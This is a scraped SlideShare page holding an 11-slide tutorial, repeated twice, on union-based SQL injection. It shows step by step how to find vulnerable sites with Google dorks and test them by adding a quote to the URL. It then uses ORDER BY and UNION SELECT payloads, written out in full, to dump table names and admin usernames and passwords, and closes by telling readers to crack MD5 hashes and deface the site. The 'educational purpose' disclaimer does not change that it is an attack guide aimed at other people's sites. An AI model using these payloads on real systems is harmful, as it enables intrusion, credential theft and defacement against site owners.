際際滷

際際滷Share a Scribd company logo

Union based sql injection by Urdu Tutorials Point

?Download as PPTX, PDF?
?
Al Zarqali
Al Zarqali

Union Based SQL Injection Tutorial by Urdu Tutorials Point. This Presentation is Only for Educational Purpose :-). facebook.com/UrduTutorialsPoint

1 of 11
Downloaded 29 times
Union Based SQL Injection The Basic & First Stage of Manual SQL Injection.
Finding Vulnerable Sites ? To Find Vulnerable Sites we use Google dorks. ? Index.php?id= (Example of Google Dork) ? Dorks???? Shared Along with this Tutorial.
Checking Vulnerability ? In order to check the vulnerability of site we add the single quote (`) at the end of url & hit enter. ? Www.site.com/index.php?id=1¨ if the page remains same it means it is not vuln, if it is showing any error which related to sql query, then it is vulnerable.
Finding Number of Columns ? To find number of column in site¨s database we replace quote(`) with order by n statement. ? Change the n from 1,2,3,4,´´n Until you get the error like ^Unknown Column ̄ ? If you get Unknown column on 6 number then 5 columns are there in database of site.
Finding Vulnerable Column ? To find the vulnerable column we put (-) before ID number. Like index.php?id=-2 ? & also we replace order by statement with union select.After union select we type all the number of columns like site.com/index.php?id=-2 union select 1,2,3,4,5! ? After it we will get a bold number on page
Finding Version, DB & user ? Now in the last slide we found vulnerable column which was bold. ? To find version ,database or user we replace vulnerable column. ? Version() ? Database() ? User() if the above don¨t work then user hex(@@version))
Finding Table Name ? To find table names user the following statements. ? Group_concat(table_name) information_schema.tables where table_schema=database()! ? Replace group_concat(table_name) with vulnerable column number. & type the second query after total column numbers like site.com/index.php?id=-2 union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()--
Dumping Admin Table ? Group_concat(column_name) FROM information_schema.columns WHERE table_name=mysqlchar()! ? Download & install hackbar in Mozilla Firefox https://addons.mozilla.org/en- US/firefox/addon/3899 ? Select sql>Mysql>MysqlChar() ? Then a small window will open type admin table name like in mine case it is tbl_admin click ok. Copy & paste the Chars instead of mysqlchar()
Extracting Admin info ? After hitting enter you will see admin username,passsword,id,type & many more columns on the page. ? To Dump user name ,password replace group_concat(column_name) with group_concat(username,0x3a,password) ? Replace information_schema´. Balah blah with just simple from admin table name like index.php?id=-2 union select 1,2,3,4,group_concat(username,0x3a,passwor d),6 from tbl_admin--
Extra Guideline ? To deface site you should have to find admin page which will be like site.com/admin site.com/login.php etc etc ? Before this you should have to decrypt md5 hashed password with online sites like md5online.org
? <3 ? ? Thanks for Watching I hope you have liked it ? I am Always Available for live help on team viewer please contact me in any issue ? Facebook.com/backk.sppac3 ? Facebook.com/UrduTutorialsPoint ? Stay Connected <3 for More Tutorials

More Related Content

Union based sql injection by Urdu Tutorials Point

  • 1. Union Based SQL Injection The Basic & First Stage of Manual SQL Injection.
  • 2. Finding Vulnerable Sites ? To Find Vulnerable Sites we use Google dorks. ? Index.php?id= (Example of Google Dork) ? Dorks???? Shared Along with this Tutorial.
  • 3. Checking Vulnerability ? In order to check the vulnerability of site we add the single quote (`) at the end of url & hit enter. ? Www.site.com/index.php?id=1¨ if the page remains same it means it is not vuln, if it is showing any error which related to sql query, then it is vulnerable.
  • 4. Finding Number of Columns ? To find number of column in site¨s database we replace quote(`) with order by n statement. ? Change the n from 1,2,3,4,´´n Until you get the error like ^Unknown Column ̄ ? If you get Unknown column on 6 number then 5 columns are there in database of site.
  • 5. Finding Vulnerable Column ? To find the vulnerable column we put (-) before ID number. Like index.php?id=-2 ? & also we replace order by statement with union select.After union select we type all the number of columns like site.com/index.php?id=-2 union select 1,2,3,4,5! ? After it we will get a bold number on page
  • 6. Finding Version, DB & user ? Now in the last slide we found vulnerable column which was bold. ? To find version ,database or user we replace vulnerable column. ? Version() ? Database() ? User() if the above don¨t work then user hex(@@version))
  • 7. Finding Table Name ? To find table names user the following statements. ? Group_concat(table_name) information_schema.tables where table_schema=database()! ? Replace group_concat(table_name) with vulnerable column number. & type the second query after total column numbers like site.com/index.php?id=-2 union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()--
  • 8. Dumping Admin Table ? Group_concat(column_name) FROM information_schema.columns WHERE table_name=mysqlchar()! ? Download & install hackbar in Mozilla Firefox https://addons.mozilla.org/en- US/firefox/addon/3899 ? Select sql>Mysql>MysqlChar() ? Then a small window will open type admin table name like in mine case it is tbl_admin click ok. Copy & paste the Chars instead of mysqlchar()
  • 9. Extracting Admin info ? After hitting enter you will see admin username,passsword,id,type & many more columns on the page. ? To Dump user name ,password replace group_concat(column_name) with group_concat(username,0x3a,password) ? Replace information_schema´. Balah blah with just simple from admin table name like index.php?id=-2 union select 1,2,3,4,group_concat(username,0x3a,passwor d),6 from tbl_admin--
  • 10. Extra Guideline ? To deface site you should have to find admin page which will be like site.com/admin site.com/login.php etc etc ? Before this you should have to decrypt md5 hashed password with online sites like md5online.org
  • 11. ? <3 ? ? Thanks for Watching I hope you have liked it ? I am Always Available for live help on team viewer please contact me in any issue ? Facebook.com/backk.sppac3 ? Facebook.com/UrduTutorialsPoint ? Stay Connected <3 for More Tutorials